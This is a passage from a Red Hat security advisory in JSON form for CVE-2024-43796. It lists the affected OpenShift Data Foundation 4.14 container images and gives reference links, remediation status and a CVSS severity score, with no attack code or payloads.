"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
